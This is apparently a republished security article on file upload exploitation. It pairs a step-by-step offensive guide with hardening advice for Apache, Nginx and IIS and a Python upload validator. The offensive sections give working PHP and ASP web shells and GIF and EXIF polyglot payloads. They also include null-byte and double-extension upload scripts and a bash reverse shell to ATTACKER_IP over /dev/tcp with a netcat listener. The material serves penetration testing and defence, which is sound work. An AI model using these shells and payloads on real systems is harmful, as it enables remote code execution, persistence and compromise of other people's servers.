The Ultimate File Upload Exploitation Cheat Sheet: 7 Ways Hackers Bypass Your Filters (And How to Stop Them)



Introduction:

File upload functionalities are one of the most common yet dangerous attack vectors in modern web applications. When improperly secured, they allow attackers to upload malicious scripts, backdoors, or polyglot files that can lead to remote code execution (RCE) and full system compromise. This article extracts technical insights from the “File Upload Cheat Sheet” shared by Hacking Articles (Telegram: https://lnkd.in/guNwrc_d) and provides a comprehensive, hands-on guide to both exploiting and hardening file upload mechanisms across Linux and Windows environments.

Learning Objectives:

  • Understand and replicate seven common file upload bypass techniques used by penetration testers and red teams.
  • Implement server‑side validation, content inspection, and secure configuration on Apache, Nginx, and IIS.
  • Use automated tools and manual commands to detect, exploit, and mitigate file upload vulnerabilities.

You Should Know:

  1. Common File Upload Bypass Techniques – Client‑Side vs. Server‑Side

Many applications rely solely on JavaScript or HTML attributes (e.g., `accept="image/*"` on the file input) for filtering. Client‑side checks never leave the browser, so an attacker bypasses them trivially by intercepting and modifying the request with Burp Suite or simply disabling JavaScript; the only checks that count are the ones the server performs.

Step‑by‑step guide:

  • Intercept the upload request using Burp Suite or OWASP ZAP.
  • In the multipart body, change the part's `Content-Type` header from `application/x-php` to `image/jpeg` or `text/plain`.
  • Modify the filename extension (e.g., `shell.php.jpg`) and observe whether the server still stores and executes the file.
  • Upload a harmless PHP test payload saved as `test.php`, then request it: if the response is the script's output rather than its source text, the server executes uploaded files.

Linux command to list every file in the upload directory with its owner and mode (look for executable bits and unexpected script extensions):

find /var/www/html/uploads -type f -exec ls -la {} \;

Windows PowerShell equivalent:

Get-ChildItem -Path C:\inetpub\wwwroot\uploads -Recurse -File | Select-Object Name, Extension, Length, LastWriteTime

  2. MIME Type Spoofing and Content‑Type Validation Bypass

Servers that check only the `Content-Type` header (not the actual file content) are easily fooled. Attackers can upload a malicious script while claiming it is an image.

Step‑by‑step guide:

  • Craft a PHP web shell (the one‑line `cmd.php` from section 5 will do) and save it as `evil.php`.
  • In Burp Suite, change the part's `Content-Type` to `image/png`.
  • Send the request. If the server accepts it, navigate to `/uploads/evil.php?cmd=whoami`.
  • For more stealth, embed the PHP code inside a real image (polyglot); the JPEG header and comment segment keep the file a valid image for content sniffers:
    exiftool -Comment='<?php system($_GET["cmd"]); ?>' legit.jpg
    cp legit.jpg evil.jpg.php
    
  • Upload `evil.jpg.php` with `Content-Type: image/jpeg`. Because the name still ends in `.php`, any server that maps `.php` to the PHP handler executes the comment payload; the image bytes exist only to defeat content inspection.

  3. Double Extensions and Null Byte Injection (Legacy Systems)

Older stacks (PHP before 5.3.4, and some older Windows application stacks) pass the filename to C library calls that treat a null byte as the end of the string, so everything after `%00` is ignored. This lets `shell.php%00.jpg` pass an extension check as a `.jpg` while being saved as `shell.php`.

Step‑by‑step guide (for educational testing only):

  • Intercept upload request and modify filename to shell.php%00.jpg.
  • The bypass only works when the decoded filename reaches a C‑level file function (e.g., `fopen` in PHP before 5.3.4) that truncates at the NUL; current PHP refuses paths containing null bytes.
  • Alternatively, use double extensions: `shell.php.jpg`. Apache's mod_mime evaluates every extension in a name, so with `AddHandler php5-script .php` (or `AddHandler application/x-httpd-php .php`) the file is still handed to PHP even though it ends in `.jpg`.
  • Modern mitigation: reject any filename containing a null byte, canonicalise the name before validation, and validate only the final extension against an allowlist.
  • Test with a Python script (it sends a real NUL byte in the filename, which is what a vulnerable decoder sees):
    import requests

    url = "http://target.com/upload"
    # filename carries a literal NUL; the part is declared image/jpeg to pass a naive MIME check
    files = {'file': ('shell.php\x00.jpg', '<?php system("id"); ?>', 'image/jpeg')}
    r = requests.post(url, files=files)
    print(r.status_code)
    print(r.text)
    

  4. Image Magic Bytes and Polyglot Files – Hiding Payloads in Metadata

Advanced bypasses involve creating files that are valid images and valid scripts simultaneously. This defeats both extension and magic‑number checks.

Step‑by‑step guide:

  • Create a minimal GIF polyglot:
    echo -e 'GIF89a\x00\x00\x00\x00<?php system($_GET["cmd"]); ?>' > polyglot.php.gif
    
  • Upload the file. If the server checks only the first 6 bytes (GIF89a), it passes.
  • Use `exiftool` to inject a PHP payload into an image comment:
    exiftool -Description="<?php echo 'Vulnerable'; ?>" image.jpg
    
  • The metadata payload only runs if the file is fed to the PHP interpreter: through a local file inclusion bug (`include($_GET['page'])`) or a handler mapping that sends the image extension to PHP. Served as a plain image it never executes; the comment is just the carrier.
  • Verify with strings polyglot.php.gif | grep "<?php".

  5. Deploying a Web Shell via Upload – From Upload to System Access

Once a file upload vulnerability is confirmed, the next step is deploying a functional web shell for persistence and lateral movement.

Step‑by‑step guide (red team simulation):

  • Use a minimalistic web shell like cmd.php:
    <?php if(isset($_REQUEST['cmd'])){ echo '<pre>'; system($_REQUEST['cmd']); echo '</pre>'; } ?>
    
  • Upload using any bypass technique from sections 1–4.
  • Access the shell: `http://target.com/uploads/cmd.php?cmd=whoami`
    – For classic ASP on IIS, adapt the payload and upload it as `.asp`:

    <% eval request("cmd") %>
    

    – Use a reverse shell for interactive access. Linux reverse shell payload (upload as `.php`, replace `ATTACKER_IP`):

    <?php exec("/bin/bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1'"); ?>
    

    – Set up the listener on the attacking host before requesting the file: `nc -lvnp 4444`


  6. Mitigation: Secure File Upload Hardening – Commands for Linux & Windows

Effective defense requires multiple layers: whitelist extensions, rename files, scan content, and set proper permissions.

Step‑by‑step guide for system administrators:

  • Whitelist extensions – Only allow jpg, png, pdf, txt. Reject all others.
  • Rename files – Use random UUIDs, never trust user‑supplied names.
  • Disable script execution in upload directories (and keep the directory outside the web root wherever the application allows it):
    – Apache: in the vhost or `httpd.conf`, wrap the directory in `<Directory /var/www/html/uploads>` with `php_admin_flag engine off` (mod_php) or `RemoveHandler .php .phtml` plus `SetHandler None`. Prefer server config over `.htaccess`: an attacker who can upload files may also be able to overwrite `.htaccess` and re‑enable the handler.
    – Nginx: `location ~ ^/uploads/.*\.(php|phtml|pl|py|jsp|asp)$ { deny all; }`, placed above the general `~ \.php$` block, because nginx uses the first matching regex location.
    – IIS: remove script handlers for the upload folder via a `web.config` in that folder (`<handlers accessPolicy="Read">` with `<clear />`).
  • Validate file content – Use the `file` command on Linux (it reads the magic bytes, not the extension):

    file --mime-type -b upload.bin
    
  • Windows PowerShell content validation (read the magic bytes; `[System.Web.MimeMapping]::GetMimeMapping` only maps the extension and never opens the file, so it is not content validation):
    # JPEG must start with FF D8 FF; use -AsByteStream instead of -Encoding Byte on PowerShell 7
    $magic = Get-Content -Path "file.jpg" -Encoding Byte -TotalCount 3
    if (-not ($magic.Count -eq 3 -and $magic[0] -eq 0xFF -and $magic[1] -eq 0xD8 -and $magic[2] -eq 0xFF)) { Remove-Item "file.jpg" }
    
  • Scan for malware – Integrate ClamAV:
    clamscan --no-summary --infected upload.php
    
  • Set restrictive permissions – the directory needs its execute bit to stay traversable (`chmod 644` on a directory breaks access to the files inside), files do not; neither replaces disabling the handler, since the interpreter runs a script regardless of its mode:
    chown -R www-data:www-data /var/www/uploads && chmod 750 /var/www/uploads && find /var/www/uploads -type f -exec chmod 640 {} +
    
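One way to implement the steps above as a single server‑side validation gate, added here as example code (not the cheat sheet's own; the allowlist table, file names and the sample uploads in `demo()` are constructed). It also closes the MIME‑spoofing and double‑extension/null‑byte cases from sections 2 and 3, and is meant to sit in front of, not instead of, the handler and permission changes listed above:

```python
# Added example (not the cheat sheet's own code): a single server-side gate that
# applies the hardening steps above to one upload, and in doing so closes the
# bypasses from sections 2 and 3 (MIME spoofing, double extensions, %00 names).
# It strips path components, rejects null/control characters, inspects every
# dotted part of the name, allowlists the final extension, checks the declared
# Content-Type against the file's magic bytes, and stores under a random UUID.
# Sample uploads in demo() are constructed; names and MIME table are placeholders.

import os
import re
import uuid

# Allowlisted extensions with the declared MIME type and magic bytes each must carry.
ALLOWED = {
    "jpg": ("image/jpeg", (b"\xff\xd8\xff",)),
    "png": ("image/png", (b"\x89PNG\r\n\x1a\n",)),
    "gif": ("image/gif", (b"GIF87a", b"GIF89a")),
    "pdf": ("application/pdf", (b"%PDF-",)),
}
# Extensions that must not appear in ANY dotted part of the name (defence in depth
# against shell.php.jpg on an Apache AddHandler setup).
SCRIPT_EXTS = {"php", "php3", "php4", "php5", "php7", "phtml", "phar", "asp", "aspx",
               "jsp", "jspx", "pl", "py", "cgi", "sh", "htaccess"}
SAFE_NAME = re.compile(r"[a-z0-9][a-z0-9._-]*")

class UploadRejected(ValueError):
    """Raised with a reason the application can log (do not echo it to the user verbatim)."""

def canonical_name(filename: str) -> str:
    """Basename only, no NUL/control bytes, lower-cased, restricted character set."""
    if "\x00" in filename:
        raise UploadRejected("null byte in filename")
    name = os.path.basename(filename.replace("\\", "/")).strip().lower()
    if not SAFE_NAME.fullmatch(name):
        raise UploadRejected("filename empty, hidden, or contains disallowed characters")
    return name

def check_extension(name: str) -> str:
    """Return the allowlisted final extension; refuse names that carry a script
    extension anywhere (so both shell.php.jpg and shell.jpg.php are rejected)."""
    parts = name.split(".")
    if len(parts) < 2:
        raise UploadRejected("no extension")
    if any(part in SCRIPT_EXTS for part in parts[1:]):
        raise UploadRejected("script extension present in name")
    ext = "jpg" if parts[-1] == "jpeg" else parts[-1]
    if ext not in ALLOWED:
        raise UploadRejected(f"extension .{ext} not allowed")
    return ext

def check_content(ext: str, declared_type: str, data: bytes) -> None:
    """Both the client's Content-Type and the real magic bytes must match the extension."""
    expected_type, magics = ALLOWED[ext]
    if declared_type.split(";")[0].strip().lower() != expected_type:
        raise UploadRejected(f"Content-Type {declared_type!r} does not match .{ext}")
    if not data.startswith(magics):
        raise UploadRejected("magic bytes do not match extension")

def accept_upload(filename: str, declared_type: str, data: bytes) -> str:
    """Validate one upload and return the random storage name; the user-supplied
    name is never used on disk."""
    ext = check_extension(canonical_name(filename))
    check_content(ext, declared_type, data)
    return f"{uuid.uuid4().hex}.{ext}"

def demo() -> dict:
    """Constructed uploads -> 'stored:<ext>' or 'rejected:<reason>'."""
    jpeg = b"\xff\xd8\xff\xe0" + b"\x00" * 16          # constructed JPEG header
    png = b"\x89PNG\r\n\x1a\n" + b"\x00" * 8           # constructed PNG header
    php = b'<?php system($_GET["cmd"]); ?>'
    cases = {
        "good_jpeg": ("Holiday.JPG", "image/jpeg", jpeg),
        "spoofed_type": ("shell.php", "image/jpeg", php),
        "double_ext": ("shell.php.jpg", "image/jpeg", jpeg),
        "null_byte": ("shell.php\x00.jpg", "image/jpeg", jpeg),
        "fake_magic": ("pic.jpg", "image/jpeg", php),
        "path_trick": ("../../uploads/x.png", "image/png", png),
    }
    verdicts = {}
    for label, (fname, ctype, data) in cases.items():
        try:
            verdicts[label] = "stored:" + accept_upload(fname, ctype, data).rsplit(".", 1)[1]
        except UploadRejected as err:
            verdicts[label] = "rejected:" + str(err)
    return verdicts

if __name__ == "__main__":
    for label, verdict in demo().items():
        print(f"{label:14s} {verdict}")
```

Because the stored name is a fresh UUID with an allowlisted extension, nothing the client controls ever reaches the filesystem path, which is what makes the `%00` and double‑extension tricks moot even on a stack that would otherwise be vulnerable.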

  7. Automated Scanning with Burp Suite & Custom Scripts

Penetration testers automate file upload testing using Burp Intruder, ffuf, and custom Python scripts.

Step‑by‑step guide:

  • Use Burp Intruder with a payload list of malicious extensions (.php, .php5, .phtml, .asp, .aspx, .jsp).
  • Fuzz the `filename` parameter with null bytes, double extensions, and case variations.
  • Example ffuf command. A multipart body needs a boundary, so save the raw upload request from Burp to `upload.req` with `filename="shell.FUZZ"` in the part header and let ffuf replay it:
    ffuf -request upload.req -request-proto http -w extensions.txt -fs 1234
    
  • Python script to test multiple bypass payloads (an HTTP 200 from the form only means it was accepted; confirm execution by fetching the stored file):
    import requests

    TARGET = 'http://target.com/upload'
    UPLOAD_DIR = 'http://target.com/uploads/'   # where stored files are served from
    payloads = ['shell.php', 'shell.php.jpg', 'shell.php%00.jpg', 'shell.phtml', 'shell.PhP']
    for p in payloads:
        files = {'file': (p, '<?php system("id"); ?>', 'image/jpeg')}
        r = requests.post(TARGET, files=files)
        # if the shell ran, the stored file answers with "uid=..." instead of its own source
        check = requests.get(UPLOAD_DIR + p)
        if r.status_code == 200 and 'uid=' in check.text:
            print(f'Executed: {p}')
    
  • Always run automated scans in authenticated context when applicable.

What Undercode Say:

  • File upload vulnerabilities (CWE‑434, mapped to A04:2021 Insecure Design in the OWASP Top 10) remain a high‑impact risk because they bypass traditional perimeter defenses and directly enable remote code execution.
  • Defense must be layered: whitelist extensions, rename files, scan magic bytes, disable execution, and apply least privilege – no single control is sufficient.
  • The Telegram cheat sheet (https://lnkd.in/guNwrc_d) provides a quick reference, but real security requires understanding how each bypass works to build effective countermeasures.
  • Both Linux and Windows environments are equally susceptible; IIS misconfigurations with ASP and ASPX are still widely exploited in corporate networks.
  • Automated fuzzing combined with manual polyglot creation gives red teams a high success rate against poorly validated upload forms.
  • Blue teams should implement real‑time content disarm and reconstruction (CDR) and use Web Application Firewalls (WAF) with granular file inspection rules.
  • Regular penetration testing of upload endpoints is non‑negotiable – they are often left out of the security checks wired into CI/CD pipelines.
  • Cloud storage integrations (S3, Azure Blob) introduce new risks if direct uploads bypass application‑side validation.
  • Training developers on secure file handling using the principles in this article reduces vulnerabilities at the source.
  • The future of file upload attacks will focus on bypassing AI‑based content filters using adversarial image payloads.

Prediction:

As AI‑driven security scanners become mainstream, attackers will shift from simple extension and MIME spoofing to more sophisticated polyglot files that exploit semantic ambiguities in machine learning models. We will see an increase in “data‑only” file upload attacks where malicious code is hidden inside valid JSON, XML, or PDF structures, bypassing signature‑based detection. Concurrently, automated red team tooling will integrate LLMs to generate context‑aware payloads tailored to each application's validation logic. Organizations must adopt zero‑trust file handling, treating every uploaded file as untrusted until it has been validated and, where warranted, detonated in a sandbox. The arms race between file upload filters and bypass techniques is only accelerating.

Reported By: Cybersecurity Infosec – Hackers Feeds